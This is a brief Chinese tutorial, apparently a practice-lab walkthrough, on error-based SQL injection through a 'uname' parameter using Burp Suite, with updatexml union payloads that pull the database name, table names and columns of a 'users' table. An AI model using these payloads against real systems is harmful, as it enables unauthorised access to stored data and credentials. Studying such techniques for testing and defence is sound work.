一、判断注入点
首先,我们使用burpsuit抓包,个人认为这样比较方便吧,你们也可以使用其他方式,基本过程都一样
二、判断回显字段
这里回显字段是有两个,看下图,如果回显字段为3时,响应显示报错,字段为2是则没有报错
三、获取数据库
uname=1234'union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#
四、获取数据表
uname=1234'union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
五、获取字段
这里我们选择users这个表来演示,其他表你们如果感兴趣也可以自己弄
uname=1234'union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#
六、获取username、password
SQL注入大部分步骤也是差不多的,如果多你们有帮助,动动小手点个赞!
如有冒犯或错误,请及时告知!Thanks♪(・ω・)ノ